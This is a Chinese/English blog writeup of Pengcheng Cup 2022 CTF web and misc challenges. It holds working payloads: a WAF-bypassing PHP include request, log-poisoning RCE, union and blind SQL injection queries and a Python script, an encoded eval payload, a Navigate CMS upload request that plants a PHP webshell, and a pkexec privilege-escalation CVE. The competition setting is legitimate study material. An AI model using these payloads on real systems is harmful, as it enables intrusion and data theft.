当前位置:网站首页>Pengcheng Cup 2022 web/misc writeup
Pengcheng Cup 2022 web/misc writeup
2022-08-10 23:18:00 【ek1ng】
Web
简单包含
The subject environment is relatively simple,Visit the title environment to see the source code directly
<?php
highlight_file(__FILE__);
include($_POST['flag']);
//flag in /var/www/html/flag.phpThen I tried a more conventional approach at first,就是用phpThe pseudo-protocol thenbase64bypass processing,But it will be discoveredWAF,And also no loop foundWAF的方法.
After the game, I saw what other masters were doing,One way to do this is to add dirty data,can be effectively bypassedWAF,At the same time, the command can be successfully executed,利用phpPseudo agreementflag转base64回显出来.
POST / HTTP/1.1
Host: 192.168.1.113
Content-Length: 11845
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Edg/103.0.1264.37
Origin: http://192.168.1.113
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.113/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
/*
* 提示:该行代码过长,系统自动注释不进行高亮.一键复制会移除系统注释
* flag=php://filter///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////read=convert.base64-encode/resource=flag.php
*/The practice of the association seniors is usednginx日志包含,因为php中includeThis function will check inside the read file<?php ?>tag and execute the inside of the tagphp代码,而我们通过/var/xxx/../logThis trick can be bypassed/var/log的WAF,to successfully includenginx的日志文件,那nginxwill be in the log fileHTTPRequest to be recorded,自然也包含User-Agent请求头,In this case, malicious code will be written in UAin the request header and included,就可以成功RCE了.But I don't know why I can't see it when I reproduce itcat出来的flag,因此用bash提供的base64The library tried it and found that it could be seen after transcodingflag.
Easygo
The title was initially given no attachments,The scanner can't scan it,Nowhere in the dictionaryjuice呢,The topic was given later in the eveninggo.mod的附件,But at that time, it had been closed due to military training,学长通过go mod发现module github.com/KaanSK/golang-sqli-challenge,结果这个githubThere are in the warehousesolution.md,文件里面就是payload,It's an outrageous game,It's not just the attachment that's the problem,And there are even solutionsgithub上开源了,Maybe it's a social work questionhhh,When I woke up in the morning the attachment had changed to main.go了,Let's take a look at the general solution to the problem.
package main
import (
"database/sql"
"fmt"
"log"
"net/http"
"github.com/gin-gonic/gin"
_ "github.com/lib/pq"
)
type CtfService struct {
Db *sql.DB
}
type Juice struct {
ID int
Name string
}
func (cs *CtfService) Get(c *gin.Context) {
id := c.Param("id")
var juices []Juice
query := fmt.Sprintf("SELECT * FROM juice WHERE id = '%s'", id)
rows, err := cs.Db.Query(query)
if err != nil {
if err == sql.ErrNoRows {
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
} else {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
}
} else {
defer rows.Close()
for rows.Next() {
var juice Juice
err := rows.Scan(&juice.ID, &juice.Name)
if err == nil {
juices = append(juices, juice)
}
}
c.JSON(http.StatusOK, gin.H{"result": juices})
}
}
func initDb() *sql.DB {
connStr := "host=postgresql user=postgres dbname=juice_market sslmode=disable"
db, err := sql.Open("postgres", connStr)
if err != nil {
log.Fatal(err)
}
return db
}
func setupRouter() *gin.Engine {
r := gin.Default()
db := initDb()
service := CtfService{Db: db}
r.GET("/ping", func(c *gin.Context) {
c.String(http.StatusOK, "pong")
})
r.GET("/juice/:id", service.Get)
return r
}
func main() {
r := setupRouter()
r.Run(":8080")
}根据源码,It's obviously right/juice/id这里进行注入,And there is no filtering,比较简单,union注入即可.
http://127.0.0.1:8080/juice/5'order by 3--
# 回显报错
http://127.0.0.1:8080/juice/5'order by 3--
# 正常回显
http://localhost:8080/juice/5'UNION SELECT 1,datname FROM pg_database--
# {"result":[{"ID":1,"Name":"postgres"},{"ID":1,"Name":"template1"},{"ID":1,"Name":"juice_market"},{"ID":1,"Name":"template0"}]}
http://localhost:8080/juice/5'UNION SELECT 1,table_name FROM information_schema.tables--
# Echo all table names
http://127.0.0.1:8080/juice/5'UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema = 'public'--
# {"result":[{"ID":1,"Name":"super_secret_table"},{"ID":1,"Name":"juice"}]}
http://localhost:8080/juice/5'UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='super_secret_table'--
# {"result":[{"ID":1,"Name":"flag"}]}
http://localhost:8080/juice/5'UNION SELECT 1,flag FROM super_secret_table--
# {"result":[{"ID":1,"Name":"CTF{KaanWasHere}"}]}There is no filtering either,比较基础的sql注入题目,Just use the database ispostgres,略微有些差异.
简单的php
Accessing the target machine directly gives the source code,is a need to utilizephp的trick的题目.
<?php
show_source(__FILE__);
$code = $_GET['code'];
if(strlen($code) > 80 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/is',$code)){
die(' Hello');
}else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
@eval($code);
}
?> The subject requires incomingcodeThe length of the variable string is less than or equal to80And can not contain alphanumerics and some symbols will enter the followingelse if.而else ifThis judgment condition means,[^\s\(\)]+?Refers to match any non-whitespace character once+括号,(?R)?is a recursive match,Therefore, it is limited to only call functions without passing parameters.符合条件的codevariables can be implementedRCE.
参考文章https://www.freebuf.com/articles/network/279563.html
采用URLBypass by de-encoding,先取反,然后进行url编码,在payloadThis can be reversed in China.
GET /?code=[~%8C%86%8C%8B%9A%92][~%CF]([~%9A%91%9B][~%CF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][~%CF]())); HTTP/1.1
Host: 192.168.1.111:8220
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
cmd: cat /ffffflaggg can_u_login
也是一个php的题目,给出了源码,Login will be successfulinclude “/flag.txt”,就可以看到flag.
<?php
error_reporting(0);
highlight_file(__FILE__);
$con = mysqli_connect("localhost","root","root","www");
function waf($sql) {
if (preg_match("/infor|sys|sql|thread|case|if|like|left|right|mid|cmp|sub|locate|position|match|find|field|sleep|repeat|lock|bench|process|<|>|=|xor|and|&&|\\\\/i", $sql)) {
die("hacker");
}
}
if (isset($_GET['password'])) {
$password = $_GET['password'];
waf($password);
$sql = "SELECT password FROM users WHERE username='admin' and password='$password'";
$user_result = mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if ($row['password'] === $password) {
include "/flag.txt";
} else {
echo "password error";
}
}This is the practice of the association seniors,The password was exposed by the method of Boolean blind injection,感觉payload比较有技巧,用performance_schemaMade by this table,并且用regexp和^进行字符运算,This can effectively bypass the problem for Boolean blindsleft,right,mid这样的限制.参考文章https://zhuanlan.zhihu.com/p/88422176
import requests
import string
url = "http://192.168.1.112/?password='or((select(password)from(users))not regexp'^{payload}')or(select count(*) FROM performance_schema.file_instances, performance_schema.file_instances A, performance_schema.cond_instances, performance_schema.cond_instances B)%23"
headers = {}
payload = "^"
space = string.ascii_letters + string.digits + '$'
flag = True
while flag:
for c in space:
tmp = payload + c
try:
r = url.format(payload=tmp)
# print(r)
response = requests.request("GET", r, headers=headers, timeout=2)
continue
except:
if c == "$":
flag = False
payload += c
break
print(payload)
# ^083d6653cd1d2882bd76571c4305a09b$and in additionhttps://www.cnblogs.com/xiacker/p/__one.htmlI also saw the practice of a master using time blind injection,虽然benchmark和sleep被waf限制了,But here is the basishttps://xz.aliyun.com/t/5505Regularity is usedDOS RLIKE的注入方法,用SQLCalculating the regularity for multiple times consumes computing resources and produces a delay effect to judge whether the logical operation is correct or not.
select elt((elt((select length(GROUP_CONCAT(password))from ctf_user)regexp 3,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) regexp '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+cd',1)),'a') or '1'regexp'高手高手高高手
这个题目比较复杂,The first is after visiting the site,发现是用Navigate CMS搭建的站点,通过/.git/Directory leaked source code,利用工具https://github.com/gakki429/Git_ExtractIt can be found that the version isNavigate CMS2.8,is a fairly old version,There is a vulnerability in the background arbitrary file upload,可以拿到webshell.
通过https://www.exploit-db.com/exploits/45561
POST //navigate_upload.php?session_id=fhgaqttnvp4smtgpc529mga0j3&engine=picnik&id=..././..././..././navigate_info.php HTTP/1.1
Host: 192.168.1.116
Content-Length: 212
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKIUbTficeOAkmEbn
Connection: close
------WebKitFormBoundaryKIUbTficeOAkmEbn
Content-Disposition: form-data; name="file"; filename="aaaaaa.php"
Content-Type: image/jpeg
<?php eval($_POST['aac']);?>
------WebKitFormBoundaryKIUbTficeOAkmEbn--可以拿到webshell,But the permissions are very low after connecting,有一个I_want_capture_the_flag文件,但是没有执行权限,另外还有bocai.html和bocai.png,也不知道有什么用.
Get the file outida f5看一下,found that it needs to be deletedbocai.png和bocai.html,to execute this file,But removing file permissions isn't enough either,因此需要提权.
The right to play here ispkexec的cve,https://github.com/arthepsy/CVE-2021-4034
Used after the privilege escalation is successfulchattr删除文件,Execute the program to getflag.
Misc
what_is_log
某机器的mysqlThere are some secrets in it,通过logfile can you find the password it entered or the secret(添加PCL格式提交)
使用sysdigAnalysis of log files can be performed
sysdig -r flag2.scap evt.type=write | grep mysql可以找到flag
Misc_water
给出的png,查看hexFound twopng + 1an invertedpng组成,先分别提取3张图片.
然后由于water,Watermarks come to mind,The script can be extracted with Fourier blind watermarking.
import cv2 as cv
import numpy as np
import matplotlib.pyplot as plt
img = cv.imread('/root/桌面/flag.jpg', 0)
f = np.fft.fft2(img)
fshift = np.fft.fftshift(f)
s1 = np.log(np.abs(fshift))
plt.subplot(121)
plt.imshow(img, 'gray')
plt.title('original')
plt.subplot(122)
plt.imshow(s1,'gray')
plt.title('center')
plt.show()边栏推荐
猜你喜欢
![68: Chapter 6: Develop article services: 1: Content sorting; article table introduction; creating [article] article services;](/img/95/7f21ecda19030c2faecbe373893d66.png)
68: Chapter 6: Develop article services: 1: Content sorting; article table introduction; creating [article] article services;
这款可视化工具神器,更直观易用!太爱了
MySQL:MySQL的集群——主从复制的原理和配置
ArcGIS中的坐标系统和投影变换
LeetCode每日两题02:反转字符串中的单词 (均1200道)
leetcode:357. 统计各位数字都不同的数字个数
Merge k sorted linked lists
leetcode:355. 设计推特
PyQt5 窗口自适应大小
诺诚健华通过注册:施一公家族身价15亿 高瓴浮亏5亿港元
随机推荐
DC-7靶场下载及渗透实战详细过程(DC靶场系列)
OneNote 教程,如何在 OneNote 中整理笔记本?
IFIT的架构与功能
带你造轮子,自定义一个随意拖拽可吸边的View
Addition of linked lists (2)
基于深度学习的三维点云分割综述
mysql中的三大日志
RecyclerView上下滑动时,不调用onBindViewHolder 导致列表的item不刷新
LeetCode Daily 2 Questions 02: Reverse the words in a string (1200 each)
如何反弹shell
有趣并发性能分享:线程池为什么设计成这样?
实例054:位取反、位移动
pytorch tear CNN
线程池如何监控,才能帮助开发者快速定位线上错误?
(PC+WAP)带手机端pbootcms模板铝合金类网站
音乐播放器(未完成版本)
JS use regular expressions in g model and non g difference
How to be a Righteous Hacker?What should you study?
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
《DevOps围炉夜话》- Pilot - CNCF开源DevOps项目DevStream简介 - feat. PMC成员胡涛